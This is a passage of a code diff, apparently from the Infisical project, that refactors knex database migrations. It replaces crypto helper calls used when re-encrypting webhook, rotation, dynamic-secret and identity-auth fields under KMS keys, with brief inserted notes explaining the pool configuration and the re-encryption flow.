// we add these overrides so that auditLogDb and the primary DB are interchangeable
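
Editor's note: one side of this hunk carries explicit pool settings for the primary and audit-log connections. A sketch of the resulting knex configuration; the connection string is a placeholder:

import knex from "knex";

const db = knex({
  client: "pg",
  connection: process.env.DB_CONNECTION_URI,
  // https://knexjs.org/guide/#pool — min: 0 lets an idle process release every
  // connection, max: 10 bounds each instance so replicas don't exhaust Postgres.
  pool: { min: 0, max: 10 },
  migrations: { tableName: "infisical_migrations" }
});

export default db;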

View File

@@ -4,7 +4,6 @@ import "ts-node/register";
import dotenv from "dotenv";
import type { Knex } from "knex";
import path from "path";
import { initLogger } from "@app/lib/logger";
// Update with your config settings.
dotenv.config({
@@ -14,8 +13,6 @@ dotenv.config({
path: path.join(__dirname, "../../../.env")
});
initLogger();
export default {
development: {
client: "postgres",
@@ -42,7 +39,7 @@ export default {
},
migrations: {
tableName: "infisical_migrations",
loadExtensions: [".mjs", ".ts"]
loadExtensions: [".mjs"]
}
},
production: {
@@ -67,7 +64,7 @@ export default {
},
migrations: {
tableName: "infisical_migrations",
loadExtensions: [".mjs", ".ts"]
loadExtensions: [".mjs"]
}
}
} as Knex.Config;

View File

@@ -16,7 +16,7 @@ const createAuditLogPartition = async (knex: Knex, startDate: Date, endDate: Dat
const startDateStr = formatPartitionDate(startDate);
const endDateStr = formatPartitionDate(endDate);
const partitionName = `${TableName.AuditLog}_${startDateStr.replaceAll("-", "")}_${endDateStr.replaceAll("-", "")}`;
const partitionName = `${TableName.AuditLog}_${startDateStr.replace(/-/g, "")}_${endDateStr.replace(/-/g, "")}`;
await knex.schema.raw(
`CREATE TABLE ${partitionName} PARTITION OF ${TableName.AuditLog} FOR VALUES FROM ('${startDateStr}') TO ('${endDateStr}')`

View File

@@ -1,10 +1,9 @@
import { Knex } from "knex";
import { inMemoryKeyStore } from "@app/keystore/memory";
import { crypto } from "@app/lib/crypto/cryptography";
import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
import { initLogger } from "@app/lib/logger";
import { KmsDataKey } from "@app/services/kms/kms-types";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
import { SecretKeyEncoding, TableName } from "../schemas";
import { getMigrationEnvConfig } from "./utils/env-config";
@@ -27,12 +26,9 @@ export async function up(knex: Knex): Promise<void> {
}
initLogger();
const superAdminDAL = superAdminDALFactory(knex);
const envConfig = await getMigrationEnvConfig(superAdminDAL);
const envConfig = getMigrationEnvConfig();
const keyStore = inMemoryKeyStore();
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
const projectEncryptionRingBuffer =
createCircularCache<Awaited<ReturnType<(typeof kmsService)["createCipherPairWithDataKey"]>>>(25);
const webhooks = await knex(TableName.Webhook)
@@ -69,15 +65,12 @@ export async function up(knex: Knex): Promise<void> {
let encryptedSecretKey = null;
if (el.encryptedSecretKey && el.iv && el.tag && el.keyEncoding) {
const decyptedSecretKey = crypto
.encryption()
.symmetric()
.decryptWithRootEncryptionKey({
keyEncoding: el.keyEncoding as SecretKeyEncoding,
iv: el.iv,
tag: el.tag,
ciphertext: el.encryptedSecretKey
});
const decyptedSecretKey = infisicalSymmetricDecrypt({
keyEncoding: el.keyEncoding as SecretKeyEncoding,
iv: el.iv,
tag: el.tag,
ciphertext: el.encryptedSecretKey
});
encryptedSecretKey = projectKmsService.encryptor({
plainText: Buffer.from(decyptedSecretKey, "utf8")
}).cipherTextBlob;
@@ -85,15 +78,12 @@ export async function up(knex: Knex): Promise<void> {
const decryptedUrl =
el.urlIV && el.urlTag && el.urlCipherText && el.keyEncoding
? crypto
.encryption()
.symmetric()
.decryptWithRootEncryptionKey({
keyEncoding: el.keyEncoding as SecretKeyEncoding,
iv: el.urlIV,
tag: el.urlTag,
ciphertext: el.urlCipherText
})
? infisicalSymmetricDecrypt({
keyEncoding: el.keyEncoding as SecretKeyEncoding,
iv: el.urlIV,
tag: el.urlTag,
ciphertext: el.urlCipherText
})
: null;
const encryptedUrl = projectKmsService.encryptor({

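This webhook migration, and the rotation, dynamic-secret, and identity-auth migrations that follow, all share one shape: decrypt the legacy value with the root symmetric key, then re-encrypt it under the project- or org-scoped KMS data key. A simplified sketch of that flow, with hypothetical function types standing in for the real crypto helpers:

// Hypothetical stand-ins for the root-key decryptor and the KMS encryptor used above.
type LegacyCiphertext = { ciphertext: string; iv: string; tag: string; keyEncoding: string };
type RootDecrypt = (input: LegacyCiphertext) => string;
type KmsEncrypt = (input: { plainText: Buffer }) => { cipherTextBlob: Buffer };

// Decrypt with the legacy root encryption key, then re-encrypt under the scoped KMS key.
const reencryptField = (
  legacy: LegacyCiphertext | null,
  decryptWithRootKey: RootDecrypt,
  kmsEncryptor: KmsEncrypt
): Buffer | null => {
  if (!legacy) return null; // nothing stored for this field
  const plaintext = decryptWithRootKey(legacy);
  return kmsEncryptor({ plainText: Buffer.from(plaintext, "utf8") }).cipherTextBlob;
};

export { reencryptField };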
View File

@@ -1,11 +1,10 @@
import { Knex } from "knex";
import { inMemoryKeyStore } from "@app/keystore/memory";
import { crypto } from "@app/lib/crypto/cryptography";
import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
import { selectAllTableCols } from "@app/lib/knex";
import { initLogger } from "@app/lib/logger";
import { KmsDataKey } from "@app/services/kms/kms-types";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
import { SecretKeyEncoding, TableName } from "../schemas";
import { getMigrationEnvConfig } from "./utils/env-config";
@@ -30,9 +29,7 @@ export async function up(knex: Knex): Promise<void> {
}
initLogger();
const superAdminDAL = superAdminDALFactory(knex);
const envConfig = await getMigrationEnvConfig(superAdminDAL);
const envConfig = getMigrationEnvConfig();
const keyStore = inMemoryKeyStore();
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
const projectEncryptionRingBuffer =
@@ -63,23 +60,20 @@ export async function up(knex: Knex): Promise<void> {
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.inputIV && el.inputTag && el.inputCiphertext && el.keyEncoding
? crypto
.encryption()
.symmetric()
.decryptWithRootEncryptionKey({
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
keyEncoding: el.keyEncoding as SecretKeyEncoding,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.inputIV,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
tag: el.inputTag,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
ciphertext: el.inputCiphertext
})
? infisicalSymmetricDecrypt({
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
keyEncoding: el.keyEncoding as SecretKeyEncoding,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.inputIV,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
tag: el.inputTag,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
ciphertext: el.inputCiphertext
})
: "";
const encryptedInput = projectKmsService.encryptor({

View File

@@ -1,11 +1,10 @@
import { Knex } from "knex";
import { inMemoryKeyStore } from "@app/keystore/memory";
import { crypto } from "@app/lib/crypto/cryptography";
import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
import { selectAllTableCols } from "@app/lib/knex";
import { initLogger } from "@app/lib/logger";
import { KmsDataKey } from "@app/services/kms/kms-types";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
import { SecretKeyEncoding, TableName } from "../schemas";
import { getMigrationEnvConfig } from "./utils/env-config";
@@ -24,9 +23,7 @@ export async function up(knex: Knex): Promise<void> {
}
initLogger();
const superAdminDAL = superAdminDALFactory(knex);
const envConfig = await getMigrationEnvConfig(superAdminDAL);
const envConfig = getMigrationEnvConfig();
const keyStore = inMemoryKeyStore();
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
const projectEncryptionRingBuffer =
@@ -56,23 +53,20 @@ export async function up(knex: Knex): Promise<void> {
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedDataTag && el.encryptedDataIV && el.encryptedData && el.keyEncoding
? crypto
.encryption()
.symmetric()
.decryptWithRootEncryptionKey({
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
keyEncoding: el.keyEncoding as SecretKeyEncoding,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.encryptedDataIV,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
tag: el.encryptedDataTag,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
ciphertext: el.encryptedData
})
? infisicalSymmetricDecrypt({
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
keyEncoding: el.keyEncoding as SecretKeyEncoding,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.encryptedDataIV,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
tag: el.encryptedDataTag,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
ciphertext: el.encryptedData
})
: "";
const encryptedRotationData = projectKmsService.encryptor({

View File

@@ -1,11 +1,10 @@
import { Knex } from "knex";
import { inMemoryKeyStore } from "@app/keystore/memory";
import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
import { selectAllTableCols } from "@app/lib/knex";
import { initLogger } from "@app/lib/logger";
import { KmsDataKey } from "@app/services/kms/kms-types";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
import { SecretKeyEncoding, TableName, TOrgBots } from "../schemas";
import { getMigrationEnvConfig } from "./utils/env-config";
@@ -55,9 +54,7 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
}
initLogger();
const superAdminDAL = superAdminDALFactory(knex);
const envConfig = await getMigrationEnvConfig(superAdminDAL);
const envConfig = getMigrationEnvConfig();
const keyStore = inMemoryKeyStore();
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
const orgEncryptionRingBuffer =
@@ -102,23 +99,19 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
orgEncryptionRingBuffer.push(orgId, orgKmsService);
}
const key = crypto
.encryption()
.symmetric()
.decryptWithRootEncryptionKey({
ciphertext: encryptedSymmetricKey,
iv: symmetricKeyIV,
tag: symmetricKeyTag,
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
});
const key = infisicalSymmetricDecrypt({
ciphertext: encryptedSymmetricKey,
iv: symmetricKeyIV,
tag: symmetricKeyTag,
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
});
const decryptedTokenReviewerJwt =
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedTokenReviewerJwt && el.tokenReviewerJwtIV && el.tokenReviewerJwtTag
? crypto.encryption().symmetric().decrypt({
? decryptSymmetric({
key,
keySize: SymmetricKeySize.Bits256,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.tokenReviewerJwtIV,
@@ -135,9 +128,8 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedCaCert && el.caCertIV && el.caCertTag
? crypto.encryption().symmetric().decrypt({
? decryptSymmetric({
key,
keySize: SymmetricKeySize.Bits256,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.caCertIV,

View File

@@ -1,11 +1,10 @@
import { Knex } from "knex";
import { inMemoryKeyStore } from "@app/keystore/memory";
import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
import { selectAllTableCols } from "@app/lib/knex";
import { initLogger } from "@app/lib/logger";
import { KmsDataKey } from "@app/services/kms/kms-types";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
import { SecretKeyEncoding, TableName, TOrgBots } from "../schemas";
import { getMigrationEnvConfig } from "./utils/env-config";
@@ -35,9 +34,7 @@ const reencryptIdentityOidcAuth = async (knex: Knex) => {
}
initLogger();
const superAdminDAL = superAdminDALFactory(knex);
const envConfig = await getMigrationEnvConfig(superAdminDAL);
const envConfig = getMigrationEnvConfig();
const keyStore = inMemoryKeyStore();
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
const orgEncryptionRingBuffer =
@@ -74,24 +71,19 @@ const reencryptIdentityOidcAuth = async (knex: Knex) => {
);
orgEncryptionRingBuffer.push(orgId, orgKmsService);
}
const key = crypto
.encryption()
.symmetric()
.decryptWithRootEncryptionKey({
ciphertext: encryptedSymmetricKey,
iv: symmetricKeyIV,
tag: symmetricKeyTag,
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
});
const key = infisicalSymmetricDecrypt({
ciphertext: encryptedSymmetricKey,
iv: symmetricKeyIV,
tag: symmetricKeyTag,
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
});
const decryptedCertificate =
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedCaCert && el.caCertIV && el.caCertTag
? crypto.encryption().symmetric().decrypt({
? decryptSymmetric({
key,
keySize: SymmetricKeySize.Bits256,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.caCertIV,

View File

@@ -1,11 +1,10 @@
import { Knex } from "knex";
import { inMemoryKeyStore } from "@app/keystore/memory";
import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
import { selectAllTableCols } from "@app/lib/knex";
import { initLogger } from "@app/lib/logger";
import { KmsDataKey } from "@app/services/kms/kms-types";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
import { SecretKeyEncoding, TableName } from "../schemas";
import { getMigrationEnvConfig } from "./utils/env-config";
@@ -28,8 +27,7 @@ const reencryptSamlConfig = async (knex: Knex) => {
}
initLogger();
const superAdminDAL = superAdminDALFactory(knex);
const envConfig = await getMigrationEnvConfig(superAdminDAL);
const envConfig = getMigrationEnvConfig();
const keyStore = inMemoryKeyStore();
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
const orgEncryptionRingBuffer =
@@ -60,24 +58,19 @@ const reencryptSamlConfig = async (knex: Knex) => {
);
orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
}
const key = crypto
.encryption()
.symmetric()
.decryptWithRootEncryptionKey({
ciphertext: encryptedSymmetricKey,
iv: symmetricKeyIV,
tag: symmetricKeyTag,
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
});
const key = infisicalSymmetricDecrypt({
ciphertext: encryptedSymmetricKey,
iv: symmetricKeyIV,
tag: symmetricKeyTag,
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
});
const decryptedEntryPoint =
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedEntryPoint && el.entryPointIV && el.entryPointTag
? crypto.encryption().symmetric().decrypt({
? decryptSymmetric({
key,
keySize: SymmetricKeySize.Bits256,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.entryPointIV,
@@ -94,9 +87,8 @@ const reencryptSamlConfig = async (knex: Knex) => {
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedIssuer && el.issuerIV && el.issuerTag
? crypto.encryption().symmetric().decrypt({
? decryptSymmetric({
key,
keySize: SymmetricKeySize.Bits256,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.issuerIV,
@@ -113,9 +105,8 @@ const reencryptSamlConfig = async (knex: Knex) => {
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedCert && el.certIV && el.certTag
? crypto.encryption().symmetric().decrypt({
? decryptSymmetric({
key,
keySize: SymmetricKeySize.Bits256,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.certIV,
@@ -194,8 +185,7 @@ const reencryptLdapConfig = async (knex: Knex) => {
}
initLogger();
const superAdminDAL = superAdminDALFactory(knex);
const envConfig = await getMigrationEnvConfig(superAdminDAL);
const envConfig = getMigrationEnvConfig();
const keyStore = inMemoryKeyStore();
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
const orgEncryptionRingBuffer =
@@ -226,24 +216,19 @@ const reencryptLdapConfig = async (knex: Knex) => {
);
orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
}
const key = crypto
.encryption()
.symmetric()
.decryptWithRootEncryptionKey({
ciphertext: encryptedSymmetricKey,
iv: symmetricKeyIV,
tag: symmetricKeyTag,
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
});
const key = infisicalSymmetricDecrypt({
ciphertext: encryptedSymmetricKey,
iv: symmetricKeyIV,
tag: symmetricKeyTag,
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
});
const decryptedBindDN =
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedBindDN && el.bindDNIV && el.bindDNTag
? crypto.encryption().symmetric().decrypt({
? decryptSymmetric({
key,
keySize: SymmetricKeySize.Bits256,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.bindDNIV,
@@ -260,9 +245,8 @@ const reencryptLdapConfig = async (knex: Knex) => {
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedBindPass && el.bindPassIV && el.bindPassTag
? crypto.encryption().symmetric().decrypt({
? decryptSymmetric({
key,
keySize: SymmetricKeySize.Bits256,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.bindPassIV,
@@ -279,9 +263,8 @@ const reencryptLdapConfig = async (knex: Knex) => {
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedCACert && el.caCertIV && el.caCertTag
? crypto.encryption().symmetric().decrypt({
? decryptSymmetric({
key,
keySize: SymmetricKeySize.Bits256,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.caCertIV,
@@ -354,8 +337,7 @@ const reencryptOidcConfig = async (knex: Knex) => {
}
initLogger();
const superAdminDAL = superAdminDALFactory(knex);
const envConfig = await getMigrationEnvConfig(superAdminDAL);
const envConfig = getMigrationEnvConfig();
const keyStore = inMemoryKeyStore();
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
const orgEncryptionRingBuffer =
@@ -386,24 +368,19 @@ const reencryptOidcConfig = async (knex: Knex) => {
);
orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
}
const key = crypto
.encryption()
.symmetric()
.decryptWithRootEncryptionKey({
ciphertext: encryptedSymmetricKey,
iv: symmetricKeyIV,
tag: symmetricKeyTag,
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
});
const key = infisicalSymmetricDecrypt({
ciphertext: encryptedSymmetricKey,
iv: symmetricKeyIV,
tag: symmetricKeyTag,
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
});
const decryptedClientId =
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedClientId && el.clientIdIV && el.clientIdTag
? crypto.encryption().symmetric().decrypt({
? decryptSymmetric({
key,
keySize: SymmetricKeySize.Bits256,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.clientIdIV,
@@ -420,9 +397,8 @@ const reencryptOidcConfig = async (knex: Knex) => {
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedClientSecret && el.clientSecretIV && el.clientSecretTag
? crypto.encryption().symmetric().decrypt({
? decryptSymmetric({
key,
keySize: SymmetricKeySize.Bits256,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.clientSecretIV,

View File

@@ -1,115 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasTable(TableName.OrgGatewayConfig))) {
await knex.schema.createTable(TableName.OrgGatewayConfig, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.string("rootCaKeyAlgorithm").notNullable();
t.datetime("rootCaIssuedAt").notNullable();
t.datetime("rootCaExpiration").notNullable();
t.string("rootCaSerialNumber").notNullable();
t.binary("encryptedRootCaCertificate").notNullable();
t.binary("encryptedRootCaPrivateKey").notNullable();
t.datetime("clientCaIssuedAt").notNullable();
t.datetime("clientCaExpiration").notNullable();
t.string("clientCaSerialNumber");
t.binary("encryptedClientCaCertificate").notNullable();
t.binary("encryptedClientCaPrivateKey").notNullable();
t.string("clientCertSerialNumber").notNullable();
t.string("clientCertKeyAlgorithm").notNullable();
t.datetime("clientCertIssuedAt").notNullable();
t.datetime("clientCertExpiration").notNullable();
t.binary("encryptedClientCertificate").notNullable();
t.binary("encryptedClientPrivateKey").notNullable();
t.datetime("gatewayCaIssuedAt").notNullable();
t.datetime("gatewayCaExpiration").notNullable();
t.string("gatewayCaSerialNumber").notNullable();
t.binary("encryptedGatewayCaCertificate").notNullable();
t.binary("encryptedGatewayCaPrivateKey").notNullable();
t.uuid("orgId").notNullable();
t.foreign("orgId").references("id").inTable(TableName.Organization).onDelete("CASCADE");
t.unique("orgId");
t.timestamps(true, true, true);
});
await createOnUpdateTrigger(knex, TableName.OrgGatewayConfig);
}
if (!(await knex.schema.hasTable(TableName.Gateway))) {
await knex.schema.createTable(TableName.Gateway, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.string("name").notNullable();
t.string("serialNumber").notNullable();
t.string("keyAlgorithm").notNullable();
t.datetime("issuedAt").notNullable();
t.datetime("expiration").notNullable();
t.datetime("heartbeat");
t.binary("relayAddress").notNullable();
t.uuid("orgGatewayRootCaId").notNullable();
t.foreign("orgGatewayRootCaId").references("id").inTable(TableName.OrgGatewayConfig).onDelete("CASCADE");
t.uuid("identityId").notNullable();
t.foreign("identityId").references("id").inTable(TableName.Identity).onDelete("CASCADE");
t.timestamps(true, true, true);
});
await createOnUpdateTrigger(knex, TableName.Gateway);
}
if (!(await knex.schema.hasTable(TableName.ProjectGateway))) {
await knex.schema.createTable(TableName.ProjectGateway, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.string("projectId").notNullable();
t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
t.uuid("gatewayId").notNullable();
t.foreign("gatewayId").references("id").inTable(TableName.Gateway).onDelete("CASCADE");
t.timestamps(true, true, true);
});
await createOnUpdateTrigger(knex, TableName.ProjectGateway);
}
if (await knex.schema.hasTable(TableName.DynamicSecret)) {
const doesGatewayColExist = await knex.schema.hasColumn(TableName.DynamicSecret, "projectGatewayId");
await knex.schema.alterTable(TableName.DynamicSecret, (t) => {
// not setting a foreign constraint so that cascade effects are not triggered
if (!doesGatewayColExist) {
t.uuid("projectGatewayId");
t.foreign("projectGatewayId").references("id").inTable(TableName.ProjectGateway);
}
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasTable(TableName.DynamicSecret)) {
const doesGatewayColExist = await knex.schema.hasColumn(TableName.DynamicSecret, "projectGatewayId");
await knex.schema.alterTable(TableName.DynamicSecret, (t) => {
if (doesGatewayColExist) t.dropColumn("projectGatewayId");
});
}
await knex.schema.dropTableIfExists(TableName.ProjectGateway);
await dropOnUpdateTrigger(knex, TableName.ProjectGateway);
await knex.schema.dropTableIfExists(TableName.Gateway);
await dropOnUpdateTrigger(knex, TableName.Gateway);
await knex.schema.dropTableIfExists(TableName.OrgGatewayConfig);
await dropOnUpdateTrigger(knex, TableName.OrgGatewayConfig);
}

View File

@@ -0,0 +1,53 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
import { createOnUpdateTrigger } from "../utils";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasTable(TableName.IdentityProfile))) {
await knex.schema.createTable(TableName.IdentityProfile, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.uuid("userId");
t.foreign("userId").references("id").inTable(TableName.Users).onDelete("CASCADE");
t.uuid("identityId");
t.foreign("identityId").references("id").inTable(TableName.Identity).onDelete("CASCADE");
t.text("temporalProfile").notNullable(); // access pattern or frequency
t.text("scopeProfile").notNullable(); // scope of usage - are they accessing development environment secrets. which paths? are they doing mainly admin work?
t.text("usageProfile").notNullable(); // method of usage
t.uuid("orgId").notNullable();
t.foreign("orgId").references("id").inTable(TableName.Organization).onDelete("CASCADE");
t.timestamps(true, true, true);
});
await createOnUpdateTrigger(knex, TableName.IdentityProfile);
}
if (!(await knex.schema.hasTable(TableName.AutomatedSecurityReports))) {
await knex.schema.createTable(TableName.AutomatedSecurityReports, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.uuid("profileId").notNullable();
t.foreign("profileId").references("id").inTable(TableName.IdentityProfile).onDelete("CASCADE");
t.jsonb("event").notNullable();
t.string("remarks").notNullable();
t.string("severity").notNullable();
t.string("status").notNullable();
t.timestamps(true, true, true);
});
await createOnUpdateTrigger(knex, TableName.AutomatedSecurityReports);
}
}
export async function down(knex: Knex): Promise<void> {
await knex.schema.dropTableIfExists(TableName.IdentityProfile);
await knex.schema.dropTableIfExists(TableName.AutomatedSecurityReports);
}

View File

@@ -1,25 +0,0 @@
import { Knex } from "knex";
import { SecretSharingType } from "@app/services/secret-sharing/secret-sharing-types";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasSharingTypeColumn = await knex.schema.hasColumn(TableName.SecretSharing, "type");
await knex.schema.alterTable(TableName.SecretSharing, (table) => {
if (!hasSharingTypeColumn) {
table.string("type", 32).defaultTo(SecretSharingType.Share).notNullable();
}
});
}
export async function down(knex: Knex): Promise<void> {
const hasSharingTypeColumn = await knex.schema.hasColumn(TableName.SecretSharing, "type");
await knex.schema.alterTable(TableName.SecretSharing, (table) => {
if (hasSharingTypeColumn) {
table.dropColumn("type");
}
});
}

View File

@@ -1,31 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasAuthConsentContentCol = await knex.schema.hasColumn(TableName.SuperAdmin, "authConsentContent");
const hasPageFrameContentCol = await knex.schema.hasColumn(TableName.SuperAdmin, "pageFrameContent");
if (await knex.schema.hasTable(TableName.SuperAdmin)) {
await knex.schema.alterTable(TableName.SuperAdmin, (t) => {
if (!hasAuthConsentContentCol) {
t.text("authConsentContent");
}
if (!hasPageFrameContentCol) {
t.text("pageFrameContent");
}
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasAuthConsentContentCol = await knex.schema.hasColumn(TableName.SuperAdmin, "authConsentContent");
const hasPageFrameContentCol = await knex.schema.hasColumn(TableName.SuperAdmin, "pageFrameContent");
await knex.schema.alterTable(TableName.SuperAdmin, (t) => {
if (hasAuthConsentContentCol) {
t.dropColumn("authConsentContent");
}
if (hasPageFrameContentCol) {
t.dropColumn("pageFrameContent");
}
});
}

View File

@@ -1,35 +0,0 @@
import { Knex } from "knex";
import { TableName } from "@app/db/schemas";
export async function up(knex: Knex): Promise<void> {
for await (const tableName of [
TableName.SecretV2,
TableName.SecretVersionV2,
TableName.SecretApprovalRequestSecretV2
]) {
const hasReminderNoteCol = await knex.schema.hasColumn(tableName, "reminderNote");
if (hasReminderNoteCol) {
await knex.schema.alterTable(tableName, (t) => {
t.string("reminderNote", 1024).alter();
});
}
}
}
export async function down(knex: Knex): Promise<void> {
for await (const tableName of [
TableName.SecretV2,
TableName.SecretVersionV2,
TableName.SecretApprovalRequestSecretV2
]) {
const hasReminderNoteCol = await knex.schema.hasColumn(tableName, "reminderNote");
